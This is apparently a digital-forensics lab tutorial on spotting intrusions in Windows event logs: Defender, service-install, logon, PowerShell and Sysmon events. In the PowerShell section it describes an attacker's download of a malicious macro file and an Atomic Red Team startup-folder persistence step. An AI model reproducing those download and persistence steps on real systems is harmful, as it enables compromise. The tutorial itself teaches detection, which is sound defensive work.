Uncover Malicious Activity with Windows Event Log Analysis
Last updated
Last updated
Uncovering malicious activity with Windows Event Log Analysis involves examining specific logs to identify abnormal behaviors, trace attackers' activities, and understand the scope of an incident.
Path: C:\Windows\System32\winevt\logs
The target system logs are located at:
C:\Cases\E\Windows\System32\winevt\logs
We can see our logs using Event Viewer.
Let's open the Application.evtx log file in EventLogExplorer.
Let’s explore what can be achieved with this tool.
We can filter logs by Event ID, description text, time frame, and other criteria.
We can also use the EvtxCmd tool to analyze all event logs from the target system.
Let's open this file using Timeline Explorer.
We can sort or filter using any of these columns.
Windows Defender, part of the built-in security suite in Windows, generates logs that provide detailed information about security-related activities on the system. These logs can be critical for detecting malicious behavior, monitoring threats, and troubleshooting security issues. Windows Defender logs events related to malware detection, scan results, real-time protection, and updates.
Microsoft-Windows-Windows-Defender
5000
Defender Enabled
Microsoft-Windows-Windows-Defender
5001
Defender Disabled
When a new service is installed or modified on a Windows system, it generates event logs that can provide valuable information about the service's installation, configuration, and any changes made. By analyzing these event logs, you can detect malicious activities, unauthorized service installations, or changes to legitimate services.
Event ID: 7045 (A new service was installed)
Let's open System.evtx log file using Event Log Explorer.
Let's filter by Event Id 7045.
The Security Event Log on Windows systems records significant security-related events, including user logons, logoff activities, authentication attempts, and account management actions. Analyzing these events helps to detect potential security incidents such as unauthorized access, privilege escalation, or lateral movement within a network.
Event ID: 4624 (Successful Logon)
Let's open the Security.evtx log file in Event Log Explorer and filter by Event ID 4624.
The Security ID (SID) is a unique identifier assigned to a user, group, or computer account in Windows. It is used internally by the operating system to manage access to resources and track actions performed by specific accounts.
S-1-5-18
: Local System account.
S-1-5-19
: Local Service account.
S-1-5-20
: Network Service account.
Logon types describe how a user accessed the system. They are crucial for identifying the nature of an authentication event.
2
Interactive
Physical logon at a system (e.g., console).
3
Network
Access via network (e.g., SMB, web access).
10
RemoteInteractive
RDP or Terminal Services logon.
Let's filter by Account Name Sec504.
Logon ID is a unique hexadecimal identifier that correlates logon sessions across multiple event logs.
When you log in to a Windows system, it is common to see two logon hexadecimal IDs generated: one for a low-privilege session and another for a higher-privilege session. This behavior occurs because Windows uses User Account Control (UAC) to manage privilege levels for interactive logins.
Low-Privilege Logon ID:
When you log in interactively, Windows first creates a standard user session by default, even if you are an administrator.
This session operates under a low-privilege token to reduce the risk of accidental or malicious changes to the system.
It is associated with a Logon Type 2 (Interactive Logon).
High-Privilege Logon ID:
If you perform an action that requires administrative rights (e.g., running a program as an administrator), UAC creates a second session with a high-privilege token.
This session is linked to your account but is treated as a separate process requiring explicit elevation.
This elevated session will have its own Logon ID.
Logon IDs play a crucial role in forensic investigations by enabling analysts to correlate different activities and actions performed during a specific session.
Let's review the actions associated with Logon ID 0xe64e2.
Let's review the actions associated with Logon ID 0xe64b4.
We can see that a new user has been added to the Administrators group.
PowerShell provides detailed logging of its activities, which can be very useful in forensic investigations, especially when analyzing the execution of malicious scripts or tracking administrative activities. The logs capture events related to PowerShell script executions, command usage, and PowerShell module activities. These logs are particularly valuable for detecting malicious activity, lateral movement, or misuse of PowerShell for post-exploitation activities.
Event ID: 400 (Engine state is changed from none to available)
This event logs the start of a PowerShell script execution. It includes:
CommandLine: The PowerShell command or script that was run.
User: The user who initiated the command.
ScriptPath: The location of the script, if applicable.
Use Case: You can use this event to track the start of potentially malicious PowerShell scripts on the system.
Event ID: 403 (PowerShell script ended)
This event logs the completion of a PowerShell script execution. It records:
Exit Code: The exit status of the script (successful or error).
Duration: The time taken for the script to execute.
Use Case: Investigating the completion of PowerShell scripts, especially if the exit code indicates a failure or error during execution.
Two files are available. Let's load them into Event Log Explorer.
The HostApplication field in PowerShell event logs refers to the application that is running the PowerShell script or command. It helps identify which process is executing the PowerShell command. In the context of your example:
HostApplication: powershell.exe
This indicates that the PowerShell command is being executed from the PowerShell executable, meaning that a standard PowerShell process is running the command.
Command: {Remove-Item -path $env:TEMP\deleteme_T1551.004}
This is the PowerShell command being executed. In this case, the command is attempting to remove a file named deleteme_T1551.004
located in the TEMP
directory.
Regularly monitor Event ID 4104 to detect potentially malicious commands being executed in your environment, especially from non-administrative users or unexpected processes. If a system is compromised, Event ID 4104 will show what scripts or commands were executed by the attacker, helping you trace their activity.
This command runs a PowerShell script that:
Sets the variable $url
to the location of a malicious Excel file (PhishingAttachment.xlsm
) hosted on GitHub.
Configures the PowerShell session to use TLS 1.2 for secure communication ([Net.ServicePointManager]::SecurityProtocol
).
Uses Invoke-WebRequest
to download the malicious Excel file from the URL and saves it to the system's TEMP directory with the name PhishingAttachment.xlsm
.
This type of command is typically used in phishing attacks, where a malicious file is downloaded and potentially executed to compromise the system.
Here's a brief explanation of what it does:
Copying the Batch File:
It copies the file batstartup.bat
from the source directory (C:\AtomicRedTeam\atomics\T1547.001\src\batstartup.bat
) to two startup locations:
$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat
(for the current user).
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat
(for all users).
Executing the Batch File:
It uses Start-Process
to run the batch file from both startup locations. This ensures that the batch file is executed every time the system starts, maintaining persistence.
Detecting malicious activity in Sysmon logs involves analyzing specific event IDs and correlating patterns of suspicious behavior. Sysmon, or System Monitor, provides detailed information about system activity that can be used to detect anomalies and threats.
Event ID 1: Process Creation
Logs every process start, including command-line arguments.
Event ID 3: Network Connection
Logs TCP/UDP connections made by processes.
Event ID 7: Image Load
Detects DLL injection or unusual libraries loaded into processes.
Event ID 8: CreateRemoteThread
Tracks threads created in the address space of another process.
Event ID 11: File Creation
Monitors file creation activities.
Event ID 12 & 13: Registry Key and Value Changes
Tracks changes to the registry.
Event ID 22: DNS Query
Logs DNS requests made by processes.
Let's open the "Microsoft-Windows-Sysmon" file and filter by Event ID 1 and the keyword "mavinject."
Let's filter for Event ID 3 to analyze network connections.